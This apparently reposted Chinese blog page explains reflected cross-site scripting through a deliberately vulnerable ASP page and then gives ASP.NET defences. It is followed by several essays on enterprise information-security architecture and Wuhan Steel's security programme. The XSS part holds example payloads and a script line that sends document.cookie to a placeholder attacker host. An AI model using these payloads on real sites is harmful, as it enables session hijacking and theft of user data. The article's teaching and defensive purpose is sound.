【转】跨站脚本XSS–褚诚云

跨站脚本XSS–褚诚云

630 views, 安全防护, by Neeao.
《程序员》文章。申明。文章仅代表个人观点,与所在公司无任何联系。
1.概述
跨站脚本Cross-Site ScriptingXSS)是最为流行的Web安全漏洞之一。据统计,2007年,跨站脚本类的安全漏洞的数目已经远远超出传统类型的安全漏洞【1】。那么,什么是跨站脚本?它的危害性是什么?Web开发人员如何在开发过程中避免这类的安全漏洞?就是我们这篇文章要讨论的内容。
2.什么是跨站脚本
2.1 跨站脚本介绍

[PS:这里讲怎样进行xss攻击讲的还是不太清楚,见http://kazge.com/archives/802.html 。]
跨站脚本,就是攻击者可以将恶意的脚本代码注入到用户浏览的其它网页上。它有好几种类型。其中最为普遍的类型称为反射类(Reflection)的跨站脚本。让我们来看下面这个例子来具体说明XSS的机理。
以一个简单的ASP网页举例。这个ASP网页的目的很简单:用户输入自身名字,ASP动态产生一个“hello world”的网页。
testXSS.html
<html>
<head> <title>XSS Test Page</title> </head>
<body>
<form action=”testXSS.asp” method=”GET”>
XSS-test page. <br>
Please enter your name:
<input type=”text” name=”txtName” value=”"></input>
<input type=”submit” value=”Hello”></input>
</form>
</body>
</html>
当用户浏览到这个网页时,就会显示:
输入用户的名字,例如foo。点击Hello,就会产生以下ASP请求:
http://<server-url>/testXSS.asp?txtName=foo
下面是后台ASP的代码,
testXSS.asp
<html>
<head> <title>XSS Test Result ASP page</title> </head>
<body>
<%
Response.Write(“Hello world! “)
Response.Write(Request.QueryString(“txtname”))
%>
</body>
</html>
动态生成的ASP网页就是:
这个ASP应用很简单,看上去没有任何功能上的问题。但是,它确存在着一个非常典型的反射类的跨站脚本漏洞。下面我们来看看攻击者是如何利用的。
在用户姓名栏中输入脚本信息:
<script>alert(“script injection\n”+document.cookie);</script><body>
发出的ASP的请求就是:
http://<server-url>/testXSS.asp?txtName=%3Cscript%3Ealert%28%22script+injection%5Cn%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E
那么,动态生成的ASP 网页中就包括了攻击者插入的脚本
<html>
<head> <title>XSS Test Result ASP page</title> </head>
<body>
Hello world! <script>alert(“script injection\n”+document.cookie);</script>
</body>
</html>
用户的Browser就会弹出以下窗口:
跨站脚本除了Reflection类型外,还有其它几种类型,例如基于DOM的跨站脚本和存储型的跨站脚本,限於篇幅,这里就不详细讨论了。有兴趣的读者可以参见【1】。
3. 跨站脚本的危害性
看了上面这个XSS的例子,那么XSS的造成的危害在哪里?下面我们通过一些问答来阐述XSS的危害性。
提问1:这不是攻击者自己键入的脚本在自己的浏览环境中执行吗?
其实不然,XSS的攻击手段是诱使用户点击email或网页中的URL链接,例如下面这个URL链接:
http://<server-url>/testXSS.asp?txtName=%3Cscript%3Ealert%28%22script+injection%5Cn%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E
这样,当一个普通用户点击的这个链接的时候,攻击者的脚本就可以在这个被攻击用户的浏览环境中执行了。
提问2:上面这个链接也太可疑了。脚本直接显示在URL中,一般的用户可能是不会点击的吧?
没错。但是在真正的攻击中,以上的script会以不同的形式编码,例如下面这种链接:
http:// <server-url>/testXSS.asp?txtName=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%73%63%72%69%70%74%20%69%6E%6A%65%63%74%69%6F%6E%5C%6E%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E
对于这种链接,许多普通用户可能就直接点击了。尤其是如果Server-url是自己经常访问的网站的话
提问3:只是显示了document.cookie有什么危害?
如果只是显示cookies的话,当然不会造成任何影响。但是,上面这个例子只是一个示范。在真正的攻击中,往往会将用户的cookies直接发送到攻击者控制的网站。例如使用以下脚本:
<script>document.location=’http://<badguy-url>/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>
提问4:窃取了document.cookie又有什么危害?
这就要从浏览器安全的基本原则:同源原则SOPSame-origin policy)讲起。简要的说,SOP意味着一个域的文档或脚本,在未经用户批准的情况下,不能获取或修改另一个域的文档的属性。为什么需要SOP?你肯定不希望在访问www.bad-url.com的时候它里面的脚本可以阅读www.hotmail.coml中的内容。
基于SOP,一个域存放的Cookie只能和该域的服务器打交道。例如,hotmailCookie只能给 hotmail服务器使用。其它任何网站都不能获取这个Cookie
正因为Cookie的这个特性,在许多Web应用的设计上,都是先用https来验证用户的登录名和密码,然后发送一个特殊的Session Cookie来代表用户验证过的身份。举个例子,如果hotmail存在在XSS漏洞,一个用户的hotmailsession cookie就可能被攻击者获取。攻击者然后就可以用这个session cookie,以这个用户的身份访问hotmail,从而造成敏感信息的泄漏(information disclosure)。
这一点不仅限于cookie,如果有xss漏洞,则可以使用跨站脚本,当合法用户操作时执行了恶意站点的代码。参见
http://www.laabc.com/?p=18356
4.如何避免XSS安全漏洞
虽然在IE8中引入了客户端的XSS过滤器以减少XSS对用户造成的危害,但是XSS本质上是Web应用服务的漏洞,仅仅依赖客户端的保护措施是不够的。解决问题的根本是在Web应用程序的代码中消除XSS安全漏洞。
以下是在Web应用的开发中避免XSS安全漏洞的几个原则:

  • 检查所有产生动态网页的代码
  • 判定动态网页的内容是否包括不安全的输入信息
  • 对输入进行校验
  • 对输出进行编码以过滤特殊字符

采用不同的Web开发工具,实施以上原则的具体步骤也不相同。下面我们就用微软的ASP.NET来举例。
设想如下的ASP.net应用【2】:
<%@ Page Language=”C#” ValidateRequest=”false” %>
<html>
<script runat=”server”>
void btnSubmit_Click(Object sender, EventArgs e)
{
// If ValidateRequest is false, then ‘hello’ is displayed
// If ValidateRequest is true, then ASP.NET returns an exception
Response.Write(txtString.Text);
}
</script>
<body>
<form id=”form1″ runat=”server”>
<asp:TextBox id=”txtString” runat=”server”
Text=”<script>alert(‘hello’);</script>” />
<asp:Button id=”btnSubmit” runat=”server”
OnClick=”btnSubmit_Click”
Text=”Submit” />
</form>
</body>
</html>
细心的读者可能注意到上面有一个特殊的设置ValidateRequest=”false”。我们以后会对它详细说明。
检查所有产生动态网页的代码
ASP.net有两种方式产生动态网页。一个是通过Response.Write,一个是通过<%=
判定动态网页的内容是否包括用户输入的信息
例如,检查Response.write的输出数据的来源。上例中它的数据源于txtString,是源自用户的输入数据。
验证用户的输入
ValidateRequest选项
缺省情况下,在ASP.NETmachine.config文件中,validateRequest选项是打开的。ASP.NET会自动对用户输入作一定的验证。
例如,当ValidateRequest的值为true的话,如果用户输入txtstring的值为<script>alert(‘hello’);</script>ASP.NET会有产生如下异常信息:
HttpRequestValidationException (0×80004005): A potentially dangerous Request.Form value was detected from the client (txtString=”<script>alert(‘hello…”).]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +3307682
System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +108
System.Web.HttpRequest.get_Form() +119
System.Web.HttpRequest.get_HasForm() +3309630
System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +45
System.Web.UI.Page.DeterminePostBackMode() +65
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +7350
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +213
System.Web.UI.Page.ProcessRequest() +86
System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) +18
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
需要强调的一点是:ValidateRequest只是ASP.NET提供的深层防御手段(Defense-in-Depth)。Web开发中不能仅依赖它,而没有专门的对输入的校验代码。
对不安全输入信息的校验。

  • 校验来自服务器端控制的输入,可以考虑使用 ASP.NET中的 RegularExpressionValidator RangeValidator.
  • 校验来自客户端HTML的输入,例如QueryString,客户端的输入控制,Cookie等等,可以考虑使用System.Text.RegularExpressions.Regex类用正则表达式来验证。
  • 验证其它非字符串的类型,如整数,日期,货币单位等等,可以考虑用.NET Framework数据类型校验。

有兴趣的读者可以参考【3】获取进一步的信息。
对输出进行编码以过滤特殊字符
当需要将一个字符串输出到Web网页时,但又不能完全确定这个字符串是否包括HTML的特殊字符,例如“<,>,&”等等,可以使用编码(HTMLEncode)以过滤这些特殊字符。
有以下两种HTMLEncode 手段
使用ASP.NET自身支持的HttpUtility
例如:
Response.Write(HttpUtility.HtmlEncode(Request.Form["name"]));
使用微软提供的反跨站脚本库Microsoft Anti-Cross Site Scripting Library V1.5 – AntiXss)。
AntiXSS是一个单独下载的软件库。开发人员可以从http://www.microsoft.com/downloads/details.aspx?FamilyId=EFB9C819-53FF-4F82-BFAF-E11625130C25&displaylang=en直接下载。
AntiXss的使用方式与HttpUtility类似:
String Name = AntiXss.HtmlEncode(Request.QueryString["Name"]);
那么HttpUtilityAntiXss的区别是什么?开发人员应该使用哪一种?
它们最大的区别在于HttpUtility.HtmlEncode采用的是黑名单验证(Black list)方式。即HttpUtility.HtmlEncode仅仅过滤它知道的特殊字符,而允许其它的输入。AntiXss.HtmlEncode采用的白名单验证(White list)方式。它只允许输出它认为合法的字符,而过滤掉其它的所有字符。
两者中,AntiXss.HtmlEncode要更为安全,是推荐的使用手段。关于AntiXss的进一步信息,读者可以参考【4】。
HttpOnly  Cookie
HttpOnly cookie是一种对抗XSS安全漏洞的深层防御手段。
Web应用可以通过设置如下的Http Respone头信息将Cookie的属性设为HttpOnly
Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly
IE6 SP1版本后就会确保客户端的脚本不能使用属性设为HttpOnly Cookie。从而可以有效的降低XSS安全漏洞的危害程度。当然,如果用户使用非IE浏览器,HttpOnly就无效了。关于HttpOnly Cookie的进一步信息,读者可以参考【5】。
5.总结
跨站脚本XSS是最为常见的一类Web安全漏洞。它会导致用户敏感信息的丢失。Web开发人员在开发过程中应采取必要的校验和编码手段来避免XSS安全漏洞。
6.参考文献

  1. Cross-site scripting, http://en.wikipedia.org/wiki/Cross-site_scripting, Wikipedia
  2. How To: Prevent Cross-Site Scripting in ASP.NET, http://msdn.microsoft.com/en-au/library/ms998274.aspx#paght000004_step2, Microsoft
  3. How To: Protect From Injection Attacks in ASP.NET, http://msdn.microsoft.com/en-au/library/bb355989.aspx, Microsoft
  4. Microsoft Anti-Cross Site Scripting Library V1.5: Protecting the Contoso Bookmark Page, http://msdn.microsoft.com/en-us/library/aa973813.aspx, Microsoft
  5. Mitigating Cross-site Scripting With HTTP-only Cookies, http://msdn.microsoft.com/en-us/library/ms533046.aspx, Microsoft

Tags: XSS

Continue reading 【转】跨站脚本XSS–褚诚云

【参考】设计企业信息系统的安全体系

设计企业信息系统的安全体系

                            
     一项建筑工程实施的依据是它的建筑蓝图,是一张张的图纸,这些图纸是经过许多建筑师、设计师分析地理位置、土质、风向、空气湿度、供电、供水、建材类型、 强度、造型等多种因素,并经过多番论证才得出的成果,里面包含了很多智慧的结晶。同样,信息网络系统的安全工程也需要一个构建蓝图,一个实施依据,否则就 会没有结果或者结果只是一些“豆腐渣”工程。
安全体系是安全工程实施的指导方针和必要依据,它的质量也决定了安全工程的质量。所以,应把安全体系的设计提升到一定的高度,确保安全体系的可靠性、可行性、完备性和可扩展性。

一、好的安全体系
    具有什么特征?
    为了保证安全体系的实用性,在设计安全体系时,必须遵循以下四项原则:
    (1) 体系的安全性:设计安全体系的最终目的是为安全工程提供一个可靠的依据和指导,保护信息与网络系统的安全,所以安全性成为首要目标。要保证体系的安全性, 必须保证体系的可理解性、完备性和可扩展性。
    (2) 体系的可行性:设计体系不能纯粹地从理论角度考虑,再完美的方案,如果不考虑实际因素,那么也只能是一些废纸。设计安全体系的目的是指导安全工程的实施, 它的价值也体现在所设计的工程上,如果工程的难度太大以至于无法实施,那么体系本身也就没有了实际价值。
    (3) 系统的高效性:信息与网络系统对安全提出要求的目的是能保证系统的正常运行,如果安全影响了系统的运行,那么就需要进行权衡了。信息网络系统的安全体系包 含一些软件和硬件,它们也会占用信息网络系统的一些资源。因此,在设计安全体系时必须考虑系统资源的开销,要求安全防护系统本身不能妨碍信息网络系统的正 常运转。
    (4) 体系的可承担性:安全体系从设计到工程实施以及安全系统的后期维护、安全培训等各个方面的工作都是由对象单位来支持的,单位要为此付出一定的代价和开销。 如果单位要付出的代价比从安全体系中获得的利益还要多,那么单位就不会采用这个方案。所以,在设计安全体系时,必须考虑单位的实际承受能力。

二、安全体系
    包括什么内容?
    一个完整的安全体系应该包含以下几个基本的部分,根据具体情况的不同,可以在此基础上进行修剪或扩展。
    (1) 风险管理:研究信息系统存在的漏洞缺陷、面临的风险与威胁,这可以通过安全风险评估技术来实现;对于可能发现的漏洞、风险,规定相应的补救方法,或者取消一些相应的服务。
           (2)行为管理:对网络行为、各种操作进行实时的监控;对各种行为进行分类管理,规定行为的范围和期限。
    (3) 信息管理:信息是it业的重要资产,由于它的特殊性,因此必须采用特殊的方式和方法进行管理,根据具体的实际情况,对不同类型、不同敏感度的信息,规定合适的管理制度和使用方法,禁止不良信息的传播。
    (4) 安全边界:信息系统与外部环境的连接处是防御外来攻击的关口,根据企业具体的业务范围,必须规定系统边界上的连接情况,防止非法用户的入侵以及系统敏感信息的外泄,如可以利用防火墙对进出的连接情况进行过滤和控制。
    (5) 系统安全:操作系统是信息系统运行的基础平台,它的安全也是信息安全的基础。根据具体的安全需求,应该规定所要采用的操作系统类型、安全级别以及使用要求。为了实现这个目的,可以采用不同安全级别的操作系统,或者在现有的操作系统上添加安全外壳。
    (6) 身份认证与授权:信息系统是为广大用户提供服务的,为了区分各个用户以及不同级别的用户组,需要对他们的身份和操作的合法性进行检查。体系应该规定实现身份认证与权限检查的方式、方法以及对这些用户的管理要求。
    (7) 应用安全:基于网络信息系统的应用有很多,存在的安全问题也很多。为了保证安全,应该根据安全需求规定所使用的应用的种类和范围,以及每一种应用的使用管理制度。
    (8) 数据库安全:保护数据库的安全一直是一个核心问题。为了达到这个目的,需要规定所采用的数据库系统的类型、管理、使用制度与方式。
    (9) 链路安全:链路层是网络协议的下层协议,针对它的攻击一般是破坏链路通信,窃取传输的数据。为了防御这些破坏、攻击,需要规定可以采取的安全措施,如链路加密机。
          (10) 桌面系统安全:桌面系统包含着用户能够直接接触到的信息、资源,也是访问信息系统的一个入口,对它的管理和使用不当也会造成敏感信息的泄露。所以,需要对各个用户提出使用桌面系统的安全要求,进行必要的安全保护。
    (11) 病毒防治:随着网络技术和信息技术的发展,各种各样的病毒泛滥成灾,严重威胁着信息财产的安全。为了避免因为病毒而造成的损失,必须制定严格的病毒防护制度,减少、关闭病毒的来源,周期性对系统中的程序进行检查,利用病毒防火墙对系统中的进程进行实时监控。
    (12) 灾难恢复与备份:不存在绝对安全的安全防护体系,为了减少由于安全事故造成的损失,必须规定必要的恢复措施,能够使系统尽快地恢复正常的运转,并对重要的信息进行周期性的备份。
    (13) 集中安全管理:为了便于安全体系的统一运转,发挥各个功能组件的功能,必须对体系实施集中的管理。因此,需要制定科学的管理制度,成立相应的管理机构。

三、别忘了评估您的安全体系
     由于安全体系的质量直接决定着安全工程的质量,因此,必须对安全体系进行严格的审查分析。在安全体系设计之后,需要聘请专家对体系的质量进行评审,并对评 审结果进行论证,对发现的不妥之处及时修正,这样才能保证体系的质量。为了保证评审结果的可靠性,所聘请的专家必须是第三方的。
     一个好的安全防护体系包括以下几个特点:结构的合理性及可扩展性、内容的完备性、组织上的可行性与安全性。对安全体系的质量进行评估也就是检验体系是否达 到了这几项要求。世界上没有一个通用的安全体系,某个信息网络系统的安全体系是针对该系统本身而言的,它不能用于另外的某个系统。所以,在设计安全体系 时,在一定的理论指导下,要结合具体的实际情况进行研究分析。要考察的实际情况主要是风险分析与评估、安全需求分析的内容,安全体系的设计是完整的信息安 全工程学中的一个环节,是以风险分析与评估、安全需求分析为基础的。

----------------------------------------------------------------------------------------------------------------------
浅析企业信息系统的安全与防范措施

摘  要:随着计算机技术与通信技术的高速发展,信息安全在企业中扮演着越来越重要的角色,为此,笔者从企业信息系统所面临的安全威胁以及企业信息系统安全运行应当采取的防范措施两方面进行了探讨。
       关键词:信息系统安全;防火墙技术;防范
       随着计算机技术与通信技术的飞速发展,信息安全已成为制约企业发展的瓶颈技术,进而使得企业对信息系统安全的依赖性达到了空前的程度,但是企业在享受着信息系统给公司带来巨大经济效 益的同时,也面临着非常大的安全风险。一旦企业信息系统受到攻击而遭遇瘫痪,整个企业就会陷入危机的境地。特别是近几年来全球范围内的计算机犯罪,病毒泛 滥,黑客入侵等几大问题, 使得企业信息系统安全技术受到了严重的威胁。因此,这就使得企业必须重新审视当前信息系统所面临的安全问题, 并从中找到针对 企业的行之有效的安全防范技术。为此,笔者首先分析了现代企业所面临的信息系统安全问题,然后提出了企业应当采取的相应防范措施。
       1企业信息系统所面临的安全威胁
       企业在信息系统的实际操作过程中,威胁是普遍存在且不可避免的。一般来说威胁就是企业所面临的潜在的安全隐患。个人电脑只通过一个简易的应用便可以满足普通 用户的要求,但是企业的信息系统一般都要充当多个角色,基本上都得为多个部门提供服务,其中任何一个局部的隐患都可能给整体的安全性带来致命的打击。正是 由于企业信息安全系统本身所固有的这些缺陷,必然会导致病毒与黑客的容易盛行。目前,影响企业系统安全的因素各种各样,但是其主要的威胁可以归结为以下几 个方面:
       ①黑客的蓄意攻击:随着信息技术的普及,企业一般都会利用互联网接入来加速提高本公司业务与工作绩效,黑客的恶意攻击 行为无疑会成为阻碍这一进程发展最大也最严重的威胁。其中,有来自竞争公司的幕后黑手,或者来自对本企业有怨恨情绪的员工,以及对该企业持不满态度的顾客 等,出于不同目的或报复情绪都可能对企业网络进行破坏与盗 窃。另外,一个更严重的问题——网络敲诈,正有逐步提升的趋势。许多不法分子利用木马、病毒、间谍软件,或者dos 攻击等非法方式对企业网络进行破坏或 盗用企业数据,并以此作为向企业敲诈勒索的交换条件,由于大部分企业普遍存在着信息安全环等薄弱问题,因此很多企业都成为这种违法行为最大的受害者。
       ② 病毒木马的破坏:现今的互联网已基本成为了一个病毒肆虐生长繁殖的土壤,几乎每一天都会有上百种新的病毒或者木马产生,而在很大部分企业中,安全技术不 足,管理设备松散、员工安全意识淡薄等问题的存在进一步滋长了病毒、蠕虫、木马等的危害,严重时甚至有可能造成整个企业网络的瘫痪,导致企业业务无法正常 进行。
       ③员工对信息网的误用:如企业技术员工由于安全配置不当引起的安全漏洞,员工安全意识薄弱,用户密码选择不恰当,将自己的账户名与口令随意告诉他人或与别人共享都会对信息系统安全带来威胁。
       ④技术缺陷:由于当前人类认知能力和技术发展的有限性,要想使硬件和软件设计都达到完美没有缺陷,基本上不可能。其次,网络硬件、软件产品多数依靠进口等这些隐患都可能可造成网络的安全问题。
       2企业信息系统安全运行的防范措施
       企业信息系统安全运行的防范措施是企业信息系统高效运行的方针,其能在很大程度上确保信息系统安全有效的运行。相应的企业安全运行的措施一般可以分为以下几类:
       ① 安全认证机制:安全认证机制是确保企业信息系统安全的一种常用技术,主要用来防范对系统进行主动攻击的恶意行为。安全认证,一方面需要验证信息发送者的真 实性,防止出现不真实;另一方面可以防止信息在传送或存储过程中被篡改、重放或延迟的可能。一般来说,安全认证的实用技术主要由身份识别技术和数字签名技 术组成。
       ②数据的加密以及解密:数据的加密与解密主要是用来防止存储介质的非法被窃或拷贝,以及信息传输线路因遭窃听而造成一些重要数据的泄漏,故在系统中应对重要数据进行加密存储与传输等安全保密措施。加密是把企业数据转换成不能直接辨识与理解的形式;而解密是加密的逆行式即把经过加密以后的信息、数据还原为原来的易读形式。
       ③入侵检测系统的配备:入侵检测系统是最近几年来才出现的网络安全技术,它通过提供实时的入侵检测,监视网络行为并进而来识别网络的入侵行为,从而对此采取相应的防护措施。
       ④采用防火墙技术:防火墙技术是为了确保网络的安全性而在内部和外部之间构建的一个保护层。其不但能够限制外部网对内部网的访问,同时也能阻止内部网络对外部网中一些不健康或非法信息的访问。
       ⑤加强信息管理:在企业信息系统的运行过程中,需要要对全部的信息进行管理,对经营活动中的物理格式和电子格式的信息进行分类并予以控制,将所有抽象的信息记录下来并存档。
       3结语
       总 之,企业信息系统的安全问题将会越来越得到人们的重视,其不但是一个技术难,同时更是一个管理安全的问题。企业信息系统安全建设是一个非常复杂的系统工 程。因此,企业必须综合考虑各种相关因素,制定合理的目标、规划相应的技术方案等。笔者相信,信息安全技术必将随着网络技术与通信技术的发展而不断得到完善。


----------------------------------------------------------------------------------------------------------------------------

武钢信息安全体系的建立与实践


作为新中国成立后兴建的第一个特大型钢铁联合企业,武汉钢铁(集团)公司拥有从矿山采掘、炼焦、炼铁、炼钢、轧钢及配套公辅设施等一整套先进的钢铁 生产工艺设备,生产规模逾3000万吨,居世界钢铁行业第七位,国内第三位。近年来,随着武钢信息化平台的高度发展,武钢的业务运营对信息系统的依赖性越 来越高,信息系统的安全运行成为影响武钢研发,生产、销售的首要问题。
一、武钢信息安全需求
武钢信息系统是武钢信息化战略的主要载体,为武钢集团各项业务活动以及生产管理控制活动提供了重要服务。现在,武钢已经形成了以公司主干网为核心运行平 台、产销资讯系统为核心应用、各单位为基本用户的运行模式,其用户分布在武钢各生产、管理职能部门。作为武钢业务运营命脉的整体产销资讯系统主要包含九大 系统:型线棒产销管理系统、硅钢产销管理系统、储区优化管理系统、客户关系及电子商务管理系统、物流供应链含理系统、设备及工程管理系统、决策支持管理系 统、电能无线计虽管理系统和信息门户管理系统。其特点是集生产、办公、管理于一体,使得武钢能够提高工作效率及客户满意度,降低成本,加强了企业的市场竞 争力。
在武钢信息化水平达到一定高度后,信息安全问题也随之而来。作为国务院信息化工作办公室推选的ISO/IEC27001信息安 全体系企业试点单位,武钢对安全的理解也实现了从网络安全到信息安全的跨越。从2004年的信息安全风险评估项目到2005年的信息安全加固项目;从到 2007年的武钢主干站点综合防护项目,到2009年的武钢防病毒及桌面管理系统升级项目和武钢主干站点综合扩点等项目,武钢信息安全体系建设的脚步越走 越稳。
二、风险评估和整体规划
保障信息安全,首先要明确安全目标,界定安全 边界,进而建立信息安全保障的管理和运行体系,达到融安全管理于日常工作的效果。因此,首先需要对武钢进行整体的信息安全风险评估。武钢风险评估的目标是 根据调查分析的结果,结合武钢信息系统的实际情况,分析系统面临的各项威胁因素;综合信息系统关键资产重要性、安全需求、现有防护措施等,评估各项威胁对武钢信息系统造成的影响,并根据影响的大小提出需要进行考虑的安全策略。
通过信息安全风险评估,我们识别出对武钢产销系统和骨干网影响最大的三个信息安全威胁是:混合型病毒和恶意代码;外部人员通过网络实施对信息系统的入侵攻击;内部人员通过网络的直接入侵和不规范操作。
根据风险评估结论,同时结合武钢信息系统实际情况,参考ISO27001、COBIT等国际、国家相关标准,一套适合武钢发展的、先进的安全技术体系结 构得以提出。在规划设计时,遵循安全策略中“深度防御战略”的多层防护原则,覆盖武钢信息系统中的主干网、公司级应用、接入单位系统等,主要从调整公司服 务器部署、提高安全性、增强网络安全保护、利用现有设备和新增防火墙进行网络安全域划分与加强访问控制来保护重要单位、网络综合监管平台构建(网络设备日 志、流量等)、微软操作系统补丁分发与更新与漏洞检查、公司重要服务器审计及安全策略配置加固以及终端配置管理、接入管理等方面着手。通过此次安全规划, 武钢提出了安全整体策略规划、运行安全规划、技术安全规划三份完整详尽的安全规划报告,以及切实可行的信息安全整体规划。
三、信息安全技术体系建设框架
在信息系统安全体系结构中,信息的安全主要依赖于信息基础设施对关键信息的处理、存储和传输的安全的保护。信息保障依赖人、操作和技术来实现组织的任 务、业务运作。针对技术、信息基础设施的管理活动同样依赖于这三个因素。稳定的信息保障体系意味着信息保障的政策、步骤,技术与机制在整个组织的信息基础 设施的所有层面上均得以实施。为了实现“深度防御”目标,需要在网络基础环境安全,边界安全、计算环境安全和支撑性安全基础设施四个方面进行设计。总体安 全技术体系框架如下图所示:
根据上述技术体系框架,公司逐步实施了一系列信息系统安全项目,这些项目都顺利完成,并且达到了预期的安全目标。
四、信息安全体系约束下的应用实践
2005年1月,武钢正式按照技术安全规到进行了产销系统和骨干网的安全加固工程。
在这次工程中,武钢对公司网络做了优化,实现路由双核心.以及站点用户访问大型机数据的链路冗余。对访问Internet擞据和访问大型机数据的路径进 行分离,同时采用路由过滤和屏蔽功能,来防止非法路由条目扩散到核心而引起路由冲突。利用封锁部分常用蠕虫病毒端口及封锁发往私有地址空间的数据,保证了 网络带宽的有效利用。
通过Symantec SESA事件分析系统的应用,从现有的防病毒服务器中获取数据进行分析。该系统有病毒排行、中毒机器排行、用户中毒排行等功能,能辅助对接入用户的管理以及病毒肪范行动决策。
武钢还对区城何防火墙进行了安装部署。通过控制Dialup区域路由器拨号用户的接入、VPN1区域路由器的接入,来实施访问控制安全策略,以限定访问 的主机范围和服务。通过外单位区城划分来实施访问控制安全策略以限定外单位用户访问的内网主机范围和服务。保护CRM系统通过设里访问控制安全策略以限定 访问的主机范围和服务。
通过区域间IDP系统的部署,在网络关键位置部署入侵俭测与防护设备,实时对网络中的协议和流最进行异常检测,及时发现和阻断网络中存在的攻击行为,确保了关键应用服务器的安全。
通过网络审计系统,实时监控审计网络中对OA, HR等服务器的HTTP、TELNET及FTP各类应用服务,在实时监控的同时也方便了事后取证。
通过访问控制系统.对于移动VPN用户访问OA、HR等企业重要数据连接进行加密、认证和用户级别的授权
补定更新系统的应用使得管理人员能及时获得所有已知安全问网的修补程序,并把这些修补程序及时分发到所有的客户机。
武钢还对主机服务器进行了加固,根据需要加固的内容,消除系统已知的漏洞或降低系统存在的风险。加固后,可以加强服务器的抗病毒及防止非法入侵的能力。 通过停用某些不必要的服务,消除系统的部分漏洞;通过增强服务器的安全配置,提高系统的安全性;通过软件升级或者安装补丁,加强系统的安全性.
网络管理系统实现了武钢主干网拓扑管理、武钢网络性能管理以及武钢网络设备监控。
桌面管理系统的应用为各厂网络管理员的管理工作提供协助,在管理中心,对本单位终端设备的实时监管。规范了客户机的操作,使非正常程序和软件无法在客户 机上运行,并且使客户机无法违规外联访问Internet,同时远程协助功能也能帮助管理员进行客户机的远程维护操作。
另外,武钢还有一套反垃圾邮件系统,部署在邮件服务器前端,进行垃圾邮件及病毒邮件的过滤和转发。该项目实施后从根本上提高了武钢信息系统的安全性,解决了当时武钢网络中存在的显著问题,完成了风险评估后的安全规划内容,为武钢信息安全体系的完善和发展打下坚实基础。
2006年10月1日,全武钢实现生产管理网与互联网的物理隔离,进一步提高武钢内网的安全和信息保密。互联网从内网完全隔离后,主要解决了五方面的问 题:互联网业务从公司生产网上分离之后,提高了生产网安全性和运行效率,减少了病毒对系统的侵害;集团公司机关部处室和各个主休厂通过上网专用区形式加强 了互联网的网络管理;安装行为审计系统,对不安全因素及时告警,对有关行为可以追溯;提高了工作效率,提高了互联网的利用效率;移动用户通过动态令牌双因 子认证后,经过SSL VPIV加密通道访问OA, HR, CRM等应用,保证了数据的安全访问。
2007年,武钢增加了主干网站 点综合防护系统,通过网络流量监控系统,对网络流盘的进行智能分析,对关键网络节点或关键网络链路上网络流且的长期实时监控分析,并提供长期的流量分析报 告。统计分析结果能够为网络改造、升级以及应用系统的变更提供决策依据。为网络性能优化提供管理依据。
2009年8月10日,某厂反映访问大型机网速慢,通过网络流且监控系统立刻对该厂当日的所有流最进行抓包分析,网络流量回溯,并通过我们的技术分析,在短时间内马上找到了引起网络访问速度慢的原因,并迅速解决了问题。
五、信息安全管理体系建设
建立健全的信息安全管理休系对武钢的安全管理工作和武钢信息安全的发展意义重大。这一体系的建立将提高员工信息安全意识,提升公司信息安全管理的水平。 增强公司抵御灾难性事件的能力。通过信息安全管理体系的建设,可有效提高公司对信息安全风险的管控能力,通过与技术安全加固相结合,使得信息安全管理更加 科学有效。
武钢信息安全管理体系确定了公司的信息安全方针是:全员参与、管控并重、持续改进、确保安全。该方针的含义是:在遵守相关 法令、法规的前提下,坚持技术与管理并重、以安全保发展、在发展中求安全的信息安全管理基本原则,在采用国内外信息安全先进技术的同时,结合国际信息安全 管理标准和最佳实践,在全公司范围内建立先进的、可持续改进的信息安全管理体系。全员参与信息安全管理体系建设,通过信息安全宣传、教育与培训。不断提高 公司员工的个人信息安全素质和公司信息系统的安全防范、安全管理能力,保障与公司重要生产经营相关的信息系统安全稳定运行;通过不断地对公司信息安全管理 体系进行内部审核和管理评审,使公司信息安全管理体系得以持续改进。
经过对武钢信息系统多层次、整体、主动的安全防御体系构建及系统 优化,使公司的主千网络安全得到了最大的改餐,2004年10月以来,没有发生大范围的信息安全事件,保证了武钢产销系统的安全稳定运行。为武钢发展注入 了后发势力,对提高武钢整体管理水平,促进管理现代化,转换经营机制,建立现代企业制度.都将发挥巨大的作用。
几年来武钢信息安全体 系的建立,实现了公司信息与息系统的保密性、完整性、可用性;实现了全年重大信息安全事故为零;公司级信息安全系统功能运转率达到98%以上;公司级信息 系统作业率达到45%以上;混合型病毒和恶意代码、外部人员通过网络实施对信息系统的入侵攻击、内部人员通过网络直接入侵和不规范操作这当初武钢信息系统 中的三大威胁已成为历史;公司级信息系统管理、使用、维护人员信息安全培训覆盖率超过80%。这使得武钢的信息安全体系建设获得了业界一致好评。
----------------------------------------------------------------------------------------------------------------------

系统分析员论文样例

中石化金卡工程江苏省联合办公室 尤一浩

江苏省石油集团公司信息技术管理处 司文全


论建立企业内部网INTRANET的策略


近年来,英特网internet以其丰富的应用在社会的迅速得以普及,internet技术的先进性,引起的企业的广泛关注。于是利用internet技术的思想,在企业局域网(LAN)上加以应用,组建企业内部网Intranet(在互联网上,相对于英特网现在有人称为内特网)成为时尚。

